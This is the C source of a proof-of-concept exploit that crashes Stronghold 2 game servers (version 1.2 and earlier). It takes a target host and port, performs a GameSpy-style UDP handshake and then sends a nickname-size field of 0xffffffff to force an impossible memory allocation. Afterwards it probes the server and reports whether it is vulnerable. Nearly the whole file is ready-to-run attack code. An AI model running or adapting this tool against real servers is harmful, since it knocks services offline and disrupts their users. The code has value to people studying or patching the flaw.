/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "gssdkcr.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER         "0.1"
#define BUFFSZ      8192
#define PORT        19966
#define TIMEOUT     1
#define TWAIT       10
#define BOOMSZ      0xffffffff  // impossible to allocate

#define ADDSHORT(x) *(u_short *)p = x; \
                    p += 2;
#define ADDINT(x)   *(u_int *)p = x; \
                    p += 4;
#define SEND(x,y)   if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer)) \
                      < 0) std_err();
#define RECV(x,y)   len = recvfrom(sd, x, y, 0, NULL, NULL); \
                    if(len < 0) std_err();
#define SOCKTOUT    if(len < 0) { \
                        fputs("\nError: socket timeout, no reply received\n\n", stdout); \
                        exit(1); \
                    }



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz);
void show_info(u_char *data, int len);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    u_int   seed;
    int     sd,
            len;
    u_short port = PORT;
    u_char  buff[BUFFSZ + 1],
            info[] =
                "\xfe\xfd" "\x00" "\x00\x00\x00\x00" "\xff\x00\x00",
            *psdk,
            *p;

#pragma pack(1) // a basic header (only sign and type remain the same)
    struct gssdk_header {
        u_short sign;
        u_char  type;
        u_short gs1;
        u_short gs2;
    } *gh;
#pragma pack()

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Stronghold 2 <= 1.2 server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    fputs("- request informations:\n", stdout);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    *(u_int *)(info + 3) = ~time(NULL);
    len = send_recv(sd, info, sizeof(info) - 1, buff, BUFFSZ);
    close(sd);
    SOCKTOUT;

    buff[len] = 0x00;
    show_info(buff, len);

    gh = (struct gssdk_header *)buff;
    psdk = buff + 7;
    seed = time(NULL);

    fputs("\n- start attack:\n", stdout);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    gh->sign = htons(0xfefe);
    gh->type = 1;
    gh->gs1  = htons(0);
    gh->gs2  = htons(0);
    memset(psdk, '0', 32);
    gssdkcr(psdk, psdk, 0);

    len = send_recv(sd, buff, 39, buff, BUFFSZ);
    SOCKTOUT;
    buff[len] = 0x00;
    if((gh->type != 2) || (ntohs(gh->gs1) != 0) || (ntohs(gh->gs2) != 1)) {
        fputs("  the first packet doesn't seem to have been accepted, I continue\n", stdout);
    }

    gh->sign = htons(0xfefe);
    gh->type = 3;
    gh->gs1  = htons(1);
    gh->gs2  = htons(1);
    gssdkcr(psdk, buff + 39, 0);
    p = psdk + 32;

    ADDINT(BOOMSZ); // nickname size, it's all we need

    len = send_recv(sd, buff, p - buff, buff, BUFFSZ);
    while(len > 0) {
        if((gh->type == 4) || (gh->type == 5)) break;
        if(timeout(sd) < 0) break;
        RECV(buff, BUFFSZ);
    }
    close(sd);

    fputs("- check server:\n", stdout);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    *(u_int *)(info + 3) = ~time(NULL);
    SEND(info, sizeof(info));
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }
    close(sd);
    return(0);
}



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz) {
    int     i,
            len;

    for(i = 3; i; i--) {        
        SEND(in, insz);
        if(!timeout(sd)) break;
    }
    if(!i) return(-1);

    RECV(out, outsz);
    return(len);
}



void show_info(u_char *data, int len) {
    int     nt = 0,
            d;
    u_char  *limit = data + len;

    for(data += 5; data < limit; data += d + 1, nt++) {
        d = strlen(data);
        if(nt & 1) {
            printf("%s\n", data);
        } else {
            if(!d) break;
            printf("%30s: ", data);
        }
    }
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


